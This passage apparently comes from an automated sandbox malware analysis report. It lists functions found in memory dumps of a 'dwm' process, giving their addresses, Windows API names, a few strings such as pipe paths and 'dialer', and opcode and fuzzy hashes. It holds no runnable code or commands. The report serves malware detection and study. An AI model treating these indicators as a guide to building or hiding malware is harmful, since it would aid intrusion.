                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: 7336d4fea9467742800bdafd3e36f5cd0b2f13cd134b2de8d79b17c5e6b35272
                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: 5F115B32710F4086E7548B56E84439967A0F78CFE4F448264FF5A877A8CF39C9948740
                                                                          Function 000001160CA42F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: f8b7d8bc0e6cc4d4fc354021b252be388e9e71aaaa705bef59079470030ccb79
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: A7318E32701B5182EA59DF16E5407E9A7A0FB88B85F488264BF4947B69EF36C4E18700
                                                                          Function 000001160CA4CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: 934748ede1297e97c92b6e1c0ca6694779cbb889be3b4c5dad1e80a11171dfc6
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: 08117C3070578086FA6CA775A9453ED62426BCC7F4F6447A4BF3A477EEDE2A84C29200
                                                                          Function 000001160CA4199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: e00dd36680488c5e306854b294cb669450076414ac262b156d1663c76e65602a
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction Fuzzy Hash: C0011731300B4482EA58DB52A8587D963A5F78CBC5F8880B5FF5943759DE3EC9C9C740
                                                                          Function 000001160CA436C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: 0ffdca176683bdef783f6cc38966b29c572938d531d7664521ae4e1a6e9a6e3b
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: BB012175712B4086FF289B26F8087D563A0BB4DB86F448564EF4907769EF3EC1848700
                                                                          Function 000001160CA48FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction ID: 2a58f658a7c323e470c1cbcda14de2c9a5e7c4f84a17343fc423aba172ae85f9
                                                                          • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction Fuzzy Hash: 9E516B32601700C6EB98DB29E848BDB6799F388B88F5085A4EF5A4774CDF76C991C700
                                                                          Function 000001160CA41A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: c4f5a9f3bdec7750fb076a0b2b05ac044ba42cffe882208c901e174971607999
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: 50F08732700B4482EB648B60E8843DA6360F78CBD8FC48060FF4946A58DE6EC6CDCB00
                                                                          Function 000001160CA43044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: 0f3f3d578e1d262db9181b57571857c6ede4d717d0689bd243bedd7d7285528d
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: A0F0F874714B8482EA588B53B9141D96661AB8CFE1F8891A0FF5A47B6CDE39C4C58700
                                                                          Function 000001160CA4BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: df2875fcd967808f31e72bcdc182bb135dbcc85f3a08aea4505e896a4e7a5df2
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: D5F06271211B0482EB188B24E4443D96320EB8C765F948299FF6A466ECCF2EC4C4C350
                                                                          Function 000001160CA45710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: d3b9a58ef7fdfc98620847497ecba833532ef1df5abfce1ac3323b88e95c3dec
                                                                          • Instruction ID: 8119352017edbc1e5719dbc53e8a196e932012c0c71d1048414cb63e1174155f
                                                                          • Opcode Fuzzy Hash: d3b9a58ef7fdfc98620847497ecba833532ef1df5abfce1ac3323b88e95c3dec
                                                                          • Instruction Fuzzy Hash: A7619336919B84C7E668CB59E44439AB7A0F3C8794F101565FB8E87BA8DF7AC584CB00
                                                                          Function 000001160CA23504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316783010.000001160CA10000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca10000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: ae4265ce5c0676ba883c7b22a609b42a8570a1f5ed9511ce877b82ba92570392
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 12119132A52B3119FE6C152FE4713F911986B5F374F4886A9BF6A062FE8B6ECCC54100
                                                                          Function 000001160CA54104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: ef42898fac8a98cab7f086ce78a0d510597cafaa0c8b598dbdd279139ff587fd
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: AF118E32A10F5121FA6C1568E8563E951517BBC3F8F18C6A4BF76076EEDB3AC8C16300
                                                                          Function 000001160CA1F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316783010.000001160CA10000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca10000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: 9a27022134f32b508db895bcfc5403c81cf6062ac62a9a7620d1548aa33e9127
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: 8961D4766003804AFB6D9BADED543EA66A1F78D7A0F544595FF0A077ACDB36C8C28300
                                                                          Function 000001160CA4AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: e3354e079389cbb30241819c4761e890b302f97d795682362dc84c150b4ac414
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: F0617A33600B888AEB28DFA5D4803DE77A1F388B88F144255EF4917B98DF39C995C700
                                                                          Function 000001160CA1A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316783010.000001160CA10000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca10000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 06a049338c248f51f8c9c97d4eb35a22e841f0982a370ea3e2fdf550de1b86b9
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: D151AF36101780CAEB788F2995443D977A0F359B94F188296FF9987BD9CB3AD8D0E700
                                                                          Function 000001160CA4AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 35391d31b81d5f61a23255a8fd09071de968050abfe3a1326edc1316720276b6
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: D0516D721407808AEB688F2595843D977A0F3D8B95F184196FF9947BD9CF39D8E1E700
                                                                          Function 000001160CA18405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316783010.000001160CA10000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca10000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: a9e0fbc99b9a415cec03e74d20746b53236eea80c30537c3395e2cfa74a3d68f
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: 4051AB326017108AEB18CF1AE444BD937A6F358BA8F5281A4EF56437CCEB3ACCC18704
                                                                          Function 000001160CA183E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316783010.000001160CA10000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca10000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: 729727e53eae1e8bd44e8f4d201b8e3c9a43c574c7127cdf072d2da5a2749f22
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 7C31783660175096EB28DF1AE844BD977A4F348BA8F168094FF5A07B8CDB3EC980C704
                                                                          Function 000001160CA52058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction ID: 0ddae2fb394e34b4ed03104435e62fbe8555982c8233d8ecc83ccb222b4ea0b4
                                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction Fuzzy Hash: 09D1D072B14B8089E719CFA9D4403EC3BB2F3587A8F148256EF5A97B9DDA35C486C340
                                                                          Function 000001160CA414A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction ID: 6d0378076b7982d1c701b62a4dd775f4e914c8d9fd3b021000850d241d3b97c1
                                                                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction Fuzzy Hash: BF012532600F90D6E708DB66A9041EAA7A0F78CB81F488425FF4A43B29DE39C0918740
                                                                          Function 000001160CA52980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction ID: f9049f7744cc93615ad294293448456b72a4b0d09a3d60613d8a1f5a951e7fca
                                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction Fuzzy Hash: E391B172B00B5485F7689F6594803ED3BA0B758B88F158289EF0A67A9DDB36C4C2C700
                                                                          Function 000001160CA47960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction ID: 260692fa5890f9ee189ddadb9940ce48c09cfbe46f610342d43073f99828b268
                                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction Fuzzy Hash: A6110332710F018AEB408BA4E8552E833A4F75D768F440E21EF6D867A8DF79C1A88380
                                                                          Function 000001160CA4253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction ID: e40e3e515670fa5c036b9549e8456ec2d64ca9ac62f7f35e16447ef1ac944d1b
                                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction Fuzzy Hash: 1C718336210B8186EB6D9F25A8443EA6794F3CDB84F540266FF0953B9DDE7AC6C5C700
                                                                          Function 000001160CA19E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316783010.000001160CA10000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca10000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: ae634c326fb1dce6b42462149244c536c5474efda413bbb73b70680e0f2a7eb6
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: 04616837A05B848AEB28DF69D4807DE7BB0F348B88F044255EF4917B99DB3AD595C700
                                                                          Function 000001160CA42330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction ID: 6d429f5d1647d76f845eb996db918fbf57633ea236caee658ec63ebb5be9004c
                                                                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction Fuzzy Hash: 1851E17260478181E67C9E2AA4583FAA791F3CD780F9502A5FF5A03B9DDE3FC5848740
                                                                          Function 000001160CA526F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          • API String ID: 442123175-4171548499
                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction ID: 525446532c4412418cfda6fa42ee0fc84d94dab09688a9bb065f4342fca980f3
                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction Fuzzy Hash: 28419E72615B8096EB24CF65E8443EAA7A0F798794F908121FF4D87798EB3DC481C740
                                                                          Function 000001160CA494A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction ID: 5b4e51e11a7731711d7dfdf6b9e165d949d84c0f652fb7667c5993548bddd47c
                                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction Fuzzy Hash: E6112B36214B8082EB658B25F44439A77E5F788B94F588260EF8C47B58DF3DC5A5CB00
                                                                          Function 000001160CA17356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316783010.000001160CA10000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca10000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: c0a5260d4565518679feef097d06a02bc0bfde01f34614aa26c6d8bc224e3694
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: 8AE08671A41B4490DF058F66E8502D833A0EB5CB64B489122AE5C46355FA38D5E9C300
